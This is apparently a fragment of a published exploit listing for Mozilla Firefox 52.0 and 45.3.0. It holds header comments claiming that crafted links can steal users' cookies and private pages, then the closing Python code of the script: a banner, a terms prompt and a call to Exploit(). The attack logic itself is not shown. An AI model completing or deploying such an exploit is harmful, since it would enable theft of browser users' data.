32bit_Mozilla Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0,Mozilla Firefox 45.3.0|Windows 7 32bit_Mozilla Firefox 45 # Software Link : https://www.mozilla.org/en-US/firefox/products/ # Version : Mozilla Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0 and probably others # CVE : N/A ###################### Mozilla Firefox is vulnerable.Exploited links can steal sensitive informations of users such as cookies or pages like private message pages. ###################### # discovered by : Rusputin ###################### """ print ColourMe(banner, 'blue'),info,ColourMe(terms, 'yellow') agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) while(agree!="y"): if agree=="n": print ColourMe("Sorry.You can't use this exploit.\n"+sadman,"red") exit() else: agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) print ColourMe("\n\n"+happyman2+"\n\n","green") Exploit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top